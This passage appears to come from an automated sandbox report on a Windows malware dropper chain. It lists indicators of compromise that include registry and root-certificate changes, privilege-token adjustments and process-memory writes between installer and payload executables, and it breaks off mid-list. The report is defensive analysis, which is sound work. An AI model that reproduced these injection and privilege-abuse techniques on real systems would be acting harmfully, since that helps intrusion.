\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 034d79263fabd701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
NTFS ADS 2 IoCs
Processes:
D2B.exedescription ioc process File created C:\ProgramData\SQWM6AN8HIEEB4JT.exe:Zone.Identifier D2B.exe File opened for modification C:\ProgramData\SQWM6AN8HIEEB4JT.exe:Zone.Identifier D2B.exe -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 122 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 686 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 820 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Thu20bc9ea26f.exepowershell.exeExplorer.EXErundll32.exesvchost.execmd.exeWerFault.exepid process 2216 Thu20bc9ea26f.exe 2216 Thu20bc9ea26f.exe 3552 powershell.exe 3552 powershell.exe 3552 powershell.exe 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 1828 rundll32.exe 1828 rundll32.exe 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 2684 svchost.exe 2684 svchost.exe 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3552 powershell.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 3496 cmd.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe 1372 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3064 Explorer.EXE -
Suspicious behavior: MapViewOfSection 15 IoCs
Processes:
Thu20bc9ea26f.exeMicrosoftEdgeCP.exedX9c0VLsY6QZmDeHO24bcfz5.exe8E7A.exeHcY5k_KrNgbxj3FPdJLM6vgP.exectghuggctghuggMicrosoftEdgeCP.exeaeghuggpid process 2216 Thu20bc9ea26f.exe 7080 MicrosoftEdgeCP.exe 7080 MicrosoftEdgeCP.exe 7080 MicrosoftEdgeCP.exe 7080 MicrosoftEdgeCP.exe 6988 dX9c0VLsY6QZmDeHO24bcfz5.exe 10192 8E7A.exe 5664 HcY5k_KrNgbxj3FPdJLM6vgP.exe 2144 ctghugg 10444 ctghugg 14924 MicrosoftEdgeCP.exe 14924 MicrosoftEdgeCP.exe 16396 aeghugg 14924 MicrosoftEdgeCP.exe 14924 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Thu20f2cf5e0c.exeThu203b503b429e68.exepowershell.exe8684174.scrThu2090b5515d63b2.exePublicDwlBrowser1100.exeWerFault.exeBearVpn 3.exe4873306.exerundll32.exesvchost.exeWerFault.execmd.exesvchost.exeWerFault.exeWerFault.exe___YHDG34.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3048 Thu20f2cf5e0c.exe Token: SeCreateTokenPrivilege 4512 Thu203b503b429e68.exe Token: SeAssignPrimaryTokenPrivilege 4512 Thu203b503b429e68.exe Token: SeLockMemoryPrivilege 4512 Thu203b503b429e68.exe Token: SeIncreaseQuotaPrivilege 4512 Thu203b503b429e68.exe Token: SeMachineAccountPrivilege 4512 Thu203b503b429e68.exe Token: SeTcbPrivilege 4512 Thu203b503b429e68.exe Token: SeSecurityPrivilege 4512 Thu203b503b429e68.exe Token: SeTakeOwnershipPrivilege 4512 Thu203b503b429e68.exe Token: SeLoadDriverPrivilege 4512 Thu203b503b429e68.exe Token: SeSystemProfilePrivilege 4512 Thu203b503b429e68.exe Token: SeSystemtimePrivilege 4512 Thu203b503b429e68.exe Token: SeProfSingleProcessPrivilege 4512 Thu203b503b429e68.exe Token: SeIncBasePriorityPrivilege 4512 Thu203b503b429e68.exe Token: SeCreatePagefilePrivilege 4512 Thu203b503b429e68.exe Token: SeCreatePermanentPrivilege 4512 Thu203b503b429e68.exe Token: SeBackupPrivilege 4512 Thu203b503b429e68.exe Token: SeRestorePrivilege 4512 Thu203b503b429e68.exe Token: SeShutdownPrivilege 4512 Thu203b503b429e68.exe Token: SeDebugPrivilege 4512 Thu203b503b429e68.exe Token: SeAuditPrivilege 4512 Thu203b503b429e68.exe Token: SeSystemEnvironmentPrivilege 4512 Thu203b503b429e68.exe Token: SeChangeNotifyPrivilege 4512 Thu203b503b429e68.exe Token: SeRemoteShutdownPrivilege 4512 Thu203b503b429e68.exe Token: SeUndockPrivilege 4512 Thu203b503b429e68.exe Token: SeSyncAgentPrivilege 4512 Thu203b503b429e68.exe Token: SeEnableDelegationPrivilege 4512 Thu203b503b429e68.exe Token: SeManageVolumePrivilege 4512 Thu203b503b429e68.exe Token: SeImpersonatePrivilege 4512 Thu203b503b429e68.exe Token: SeCreateGlobalPrivilege 4512 Thu203b503b429e68.exe Token: 31 4512 Thu203b503b429e68.exe Token: 32 4512 Thu203b503b429e68.exe Token: 33 4512 Thu203b503b429e68.exe Token: 34 4512 Thu203b503b429e68.exe Token: 35 4512 Thu203b503b429e68.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 4956 8684174.scr Token: SeDebugPrivilege 4564 Thu2090b5515d63b2.exe Token: SeDebugPrivilege 3844 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 4372 WerFault.exe Token: SeDebugPrivilege 1352 BearVpn 3.exe Token: SeDebugPrivilege 3860 4873306.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 2684 svchost.exe Token: SeRestorePrivilege 1372 WerFault.exe Token: SeBackupPrivilege 1372 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 3496 cmd.exe Token: SeAuditPrivilege 2336 svchost.exe Token: SeDebugPrivilege 1372 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeAuditPrivilege 2336 svchost.exe Token: SeDebugPrivilege 1248 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeAuditPrivilege 2336 svchost.exe Token: SeDebugPrivilege 4448 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 1828 rundll32.exe Token: SeDebugPrivilege 4944 ___YHDG34.exe Token: SeDebugPrivilege 508 WerFault.exe Token: SeDebugPrivilege 1828 rundll32.exe -
Suspicious use of FindShellTrayWindow 20 IoCs
Processes:
Explorer.EXEultramediaburner.tmpinstaller.exechrome.execlient32.exeIDownload.tmppid process 3064 Explorer.EXE 5448 ultramediaburner.tmp 6148 installer.exe 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 5484 chrome.exe 3064 Explorer.EXE 3064 Explorer.EXE 5484 chrome.exe 5484 chrome.exe 3064 Explorer.EXE 3064 Explorer.EXE 10936 client32.exe 10396 IDownload.tmp 3064 Explorer.EXE 3064 Explorer.EXE -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Explorer.EXEpid process 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE 3064 Explorer.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
Explorer.EXEMicrosoftEdge.exeMicrosoftEdgeCP.execmd.exea3nSYK3QiDj60t0XJFF7UlrQ.exeMicrosoftEdge.exeMicrosoftEdge.execmd.exeMicrosoftEdgeCP.exepid process 3064 Explorer.EXE 5824 MicrosoftEdge.exe 7080 MicrosoftEdgeCP.exe 7080 MicrosoftEdgeCP.exe 6500 cmd.exe 7308 a3nSYK3QiDj60t0XJFF7UlrQ.exe 12732 MicrosoftEdge.exe 7916 MicrosoftEdge.exe 4932 cmd.exe 14924 MicrosoftEdgeCP.exe 14924 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4880 wrote to memory of 4920 4880 setup_x86_x64_install.exe setup_installer.exe PID 4880 wrote to memory of 4920 4880 setup_x86_x64_install.exe setup_installer.exe PID 4880 wrote to memory of 4920 4880 setup_x86_x64_install.exe setup_installer.exe PID 4920 wrote to memory of 5032 4920 setup_installer.exe setup_install.exe PID 4920 wrote to memory of 5032 4920 setup_installer.exe setup_install.exe PID 4920 wrote to memory of 5032 4920 setup_installer.exe setup_install.exe PID 5032 wrote to memory of 4160 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 4160 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 4160 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 4176 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 4176 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 4176 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3752 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3752 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3752 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3348 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3348 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3348 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3472 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3472 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3472 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3560 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3560 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3560 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3524 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3524 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 3524 5032 setup_install.exe cmd.exe PID 4160 wrote to memory of 3552 4160 cmd.exe powershell.exe PID 4160 wrote to memory of 3552 4160 cmd.exe powershell.exe PID 4160 wrote to memory of 3552 4160 cmd.exe powershell.exe PID 5032 wrote to memory of 4220 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 4220 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 4220 5032 setup_install.exe cmd.exe PID 3752 wrote to memory of 3048 3752 cmd.exe Thu20f2cf5e0c.exe PID 3752 wrote to memory of 3048 3752 cmd.exe Thu20f2cf5e0c.exe PID 3348 wrote to memory of 312 3348 cmd.exe Thu20dae7c52bc0856.exe PID 3348 wrote to memory of 312 3348 cmd.exe Thu20dae7c52bc0856.exe PID 5032 wrote to memory of 4248 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 4248 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 4248 5032 setup_install.exe cmd.exe PID 4176 wrote to memory of 3972 4176 cmd.exe Thu20c467678e2c.exe PID 4176 wrote to memory of 3972 4176 cmd.exe Thu20c467678e2c.exe PID 4176 wrote to memory of 3972 4176 cmd.exe Thu20c467678e2c.exe PID 3560 wrote to memory of 4132 3560 cmd.exe Thu2026c04e7218e1.exe PID 3560 wrote to memory of 4132 3560 cmd.exe Thu2026c04e7218e1.exe PID 3560 wrote to memory of 4132 3560 cmd.exe Thu2026c04e7218e1.exe PID 3472 wrote to memory of 420 3472 cmd.exe Thu20a5f7ccaa78.exe PID 3472 wrote to memory of 420 3472 cmd.exe Thu20a5f7ccaa78.exe PID 3472 wrote to memory of 420 3472 cmd.exe Thu20a5f7ccaa78.exe PID 5032 wrote to memory of 740 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 740 5032 setup_install.exe cmd.exe PID 5032 wrote to memory of 740 